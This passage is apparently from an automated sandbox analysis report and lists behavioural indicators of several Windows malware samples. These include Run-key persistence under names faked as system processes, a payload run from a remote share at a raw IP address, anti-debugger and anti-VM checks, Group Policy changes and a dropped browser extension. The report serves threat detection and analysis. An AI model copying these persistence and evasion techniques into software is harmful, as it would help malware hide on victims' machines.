| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\\svchost.exe.exe" | C:\Users\Admin\Downloads\2023-11-23-12\2dfbf85c26d893e4dae9ca72d6677f00789c7f69ada570b93ccfccc1f37f5225.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" | \??\UNC\62.173.141.116\scarica\paypal_inv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-V1UN0C = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\explorer.exe\"" | \??\UNC\62.173.141.116\scarica\paypal_inv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe | N/A |
Creates a large amount of network flows
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\$RECYCLE.BIN\desktop.ini | C:\Program Files\7-Zip\7zG.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\$RECYCLE.BIN\desktop.ini | C:\Program Files\7-Zip\7zG.exe | N/A |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File opened for modification | \??\G:\$RECYCLE.BIN\S-1-5-21-3811856890-180006922-3689258494-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\G: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\Explorer.EXE | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Downloads\2023-11-23-10\3cbd732d1d9b72c12fd0b5338f6ea6417ec2d242f258fedab71fe48cdadccc2a.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened (read-only) | \??\E: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe683b22.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\d2e9df9c-58b2-49d2-8f75-77aeeb7ee6af.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics.pma | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOCK | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\Windows\system32\OpenWith.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a527e985-f7b0-45f2-a33d-05514db5a087.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13345225941203629 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\warnStateCache | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\Windows\system32\OpenWith.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db-journal | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe683bbe.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFe674112.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe67f7ef.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\999f8fe4-4915-4369-bf56-709cb9322cad.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\79eccb47c0d582ce_0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\RBTDPuBvwCAQssKTg\CGDsaSCQdoaAdsY\VGjcNCy.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe679c03.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\de845e8f-5b65-4d9d-a516-fd6402cb018d.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\index | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\bbb706a18101c1d5_0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RFe66e8d0.TMP | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\Windows\system32\OpenWith.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOCK | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOCK | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\odspxhsojhsrcnhepqd.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\2023-11-23-11\c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | C:\ProgramData\pinterests\XRJNZC.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Prefetch\SVCHOST.EXE-8102A33C.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\DLLHOST.EXE-A73FB9CB.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-0C84305E.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-156D43F1.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-E8196656.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-039D5D2E.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-AE5EC6E9.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-FDF50724.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\PfPre_95fc7101.mkd | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-0521102C.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-0A03C9B5.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SGRMBROKER.EXE-0CA31CC6.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-145A3777.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-08AF006C.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-23EA2E5B.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-61696F68.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-7C77C512.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-D9106866.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\AgAppLaunch.db | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\NKHNNN.EXE-30BEADEF.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-56E309E9.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-7194EF5E.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-E66A223C.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-FFCC5BB3.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-98C67737.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\WMIC.EXE-A7D06383.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-18665B15.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-641DCE1C.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNDLL32.EXE-7E8D1C35.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-72C0C855.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\RUNTIMEBROKER.EXE-B1A87C0F.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SEARCHAPP.EXE-840F7E5A.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File created | C:\Windows\Tasks\IgmMCWhKsLGKjacyM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\DLLHOST.EXE-28A8211F.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\NGEN.EXE-AE594A6B.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\SVCHOST.EXE-CABA5DBC.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\TASKHOSTW.EXE-3E0B74C8.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| File opened for modification | C:\Windows\Prefetch\WFSERVICESREG.EXE-766D3C5B.pf | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
